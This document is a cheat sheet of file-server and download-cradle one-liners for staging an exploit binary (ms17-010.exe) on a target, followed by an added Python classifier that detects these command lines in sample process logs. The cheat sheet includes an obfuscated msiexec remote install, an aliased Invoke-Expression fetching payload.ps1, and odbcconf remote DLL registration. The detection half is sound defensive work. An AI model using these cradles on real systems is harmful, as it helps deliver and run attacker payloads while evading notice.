Scenario: download http://127.0.0.1:8080/ms17-010.exe and save it locally as exploit.exe
IP: 127.0.0.1 (download host)
Port: 8080 (port)
Source File: ms17-010.exe (source file)
Destination File: exploit.exe (destination file)
1. HTTP Server (start a file server)
1.1 Python HTTP:
python -m SimpleHTTPServer 8080
1.2 Python3 HTTP:
python3 -m http.server 8080
1.3 Python FTP:
python -m pyftpdlib -p 8080
1.4 Python3 SMB (Impacket smbserver, share name "files"):
python3 impacket-smbserver.py files . -port 8080
(Note: Windows clients always connect to SMB on TCP 445, so the UNC copy in 2.4 needs the server started with -port 445.)
1.5 PHP 5.4+:
php -S 0.0.0.0:8080
1.6 Ruby:
ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 8080, :DocumentRoot => Dir.pwd).start'
1.7 Ruby 1.9.2+:
ruby -run -e httpd . -p 8080
1.8 busybox httpd:
busybox httpd -f -p 8080
2. Download the files (file download)
2.1 PowerShell - IWR:
powershell.exe -Command "Invoke-WebRequest -Uri http://127.0.0.1:8080/ms17-010.exe -OutFile exploit.exe"
2.2 PowerShell - WebClient.DownloadFile:
powershell.exe -Command "(New-Object Net.WebClient).DownloadFile('http://127.0.0.1:8080/ms17-010.exe', 'exploit.exe')"
2.3 CMD - Certutil:
certutil.exe -urlcache -split -f http://127.0.0.1:8080/ms17-010.exe exploit.exe
2.4 CMD - SMB:
copy \\127.0.0.1\files\ms17-010.exe exploit.exe
2.5 Linux - wget:
wget http://127.0.0.1:8080/ms17-010.exe -O exploit.exe
2.6 Linux - curl:
curl http://127.0.0.1:8080/ms17-010.exe -o exploit.exe
2.7 Windows Bitsadmin:
bitsadmin /rawreturn /transfer down "http://127.0.0.1:8080/ms17-010.exe" c:\exploit.exe
2.8 Windows msiexec:
msiexec /q /i http://127.0.0.1:8080/ms17-010.exe
2.9 Windows msiexec (the /i switch obfuscated as %os:~1,1%, which expands to "i" from "Windows_NT"):
msiexec /q /%os:~1,1%http://127.0.0.1:8080/ms17-010.exe
2.10 Windows PowerShell:
powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('http://127.0.0.1:8080/payload.ps1')
2.11 Windows odbcconf:
Registers (executes) a DLL that exports the expected entry point; the file does not need a .dll extension and can be fetched over UNC/WebDAV
odbcconf /s /a {regsvr \\127.0.0.1\folder\payload_dll.txt}
2.12 Python Download (Python 2, urllib2):
python -c "import urllib2; open('exploit.exe', 'wb').write(urllib2.urlopen('http://127.0.0.1:8080/ms17-010.exe').read())"
2.13 Windows IPC$ (administrative share):
copy \\127.0.0.1\c$\ms17-010.exe C:\exploit.exe
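From the defender's side, every one-liner above leaves a distinctive process command line (certutil with -urlcache, bitsadmin /transfer, msiexec pointed at a URL, odbcconf regsvr, a WebClient download, a UNC copy from an administrative share). The following added example, which is not part of the original cheat sheet, turns that list into a small command-line classifier and runs it over constructed process-creation log lines (timestamp, host, user, command line). The log format, the labels and the regexes are assumptions made for this example; a real deployment would key on Sysmon Event ID 1 or Windows 4688 fields instead.

```python
import re

# Patterns derived from the download one-liners listed on this page.
# Each entry is (label, regex) and is matched against the lower-cased command line.
# Order matters: more specific cradles are listed before broader ones.
CRADLE_PATTERNS = [
    ("powershell-alias-iex",
     re.compile(r"set-alias\s+-name\s+\S+\s+-value\s+invoke-expression")),
    ("powershell-iwr",
     re.compile(r"invoke-webrequest|\biwr\b.*-outfile")),
    ("powershell-webclient",
     re.compile(r"net\.webclient.*download(file|string)")),
    ("certutil-urlcache",
     re.compile(r"certutil(\.exe)?\s.*-urlcache.*https?://")),
    ("bitsadmin-transfer",
     re.compile(r"bitsadmin(\.exe)?\s.*/transfer")),
    # Covers both "msiexec /i http://..." and the %os:~1,1% obfuscation of /i.
    ("msiexec-remote-install",
     re.compile(r"msiexec(\.exe)?\s.*(/i\s*|%os:~1,1%)https?://")),
    ("odbcconf-regsvr",
     re.compile(r"odbcconf(\.exe)?\s.*regsvr")),
    ("python-urlopen",
     re.compile(r"python\S*\s+-c\s.*urlopen")),
    # copy \\host\share\... : a UNC copy, including admin shares such as c$.
    ("unc-copy",
     re.compile(r"\bcopy\s+\\\\[^\\\s]+\\[^\\\s]+\\")),
    # High-noise on Linux hosts; tune with process ancestry or destination path.
    ("wget-or-curl",
     re.compile(r"\b(wget|curl)\b.*https?://")),
]


def classify_command(cmdline):
    """Return the label of the first download-cradle pattern that matches, else None."""
    text = cmdline.lower()
    for label, pattern in CRADLE_PATTERNS:
        if pattern.search(text):
            return label
    return None


def scan_process_log(lines):
    """Parse constructed log lines '<timestamp> <host> <user> <cmdline>' and
    return a list of (timestamp, host, user, label) for every matching line."""
    hits = []
    for line in lines:
        parts = line.split(" ", 3)
        if len(parts) < 4:
            continue  # malformed line, skip rather than crash the scan
        ts, host, user, cmdline = parts
        label = classify_command(cmdline)
        if label:
            hits.append((ts, host, user, label))
    return hits


# Constructed sample log: one benign line among command lines taken from the page.
SAMPLE_LOG = [
    "2024-01-01T10:00:01Z ws01 alice certutil.exe -urlcache -split -f http://127.0.0.1:8080/ms17-010.exe exploit.exe",
    "2024-01-01T10:00:02Z ws01 alice notepad.exe C:\\Users\\alice\\notes.txt",
    "2024-01-01T10:00:03Z ws02 bob powershell.exe -Command \"(New-Object Net.WebClient).DownloadFile('http://127.0.0.1:8080/ms17-010.exe', 'exploit.exe')\"",
    "2024-01-01T10:00:04Z ws02 bob msiexec /q /%os:~1,1%http://127.0.0.1:8080/ms17-010.exe",
    "2024-01-01T10:00:05Z ws03 carol copy \\\\127.0.0.1\\c$\\ms17-010.exe C:\\exploit.exe",
    "2024-01-01T10:00:06Z ws03 carol bitsadmin /rawreturn /transfer down \"http://127.0.0.1:8080/ms17-010.exe\" c:\\exploit.exe",
    "2024-01-01T10:00:07Z srv01 svc odbcconf /s /a {regsvr \\\\127.0.0.1\\folder\\payload_dll.txt}",
    "2024-01-01T10:00:08Z lx01 dave wget http://127.0.0.1:8080/ms17-010.exe -O exploit.exe",
]

if __name__ == "__main__":
    for ts, host, user, label in scan_process_log(SAMPLE_LOG):
        print(f"{ts} {host} {user}: {label}")
```

The classifier is intentionally string-based so it can be dropped into a log pipeline; the regexes are substrings of the page's own commands, so a real environment should pair them with the parent process, the destination path and, for the SMB cases, the source of the UNC host before alerting.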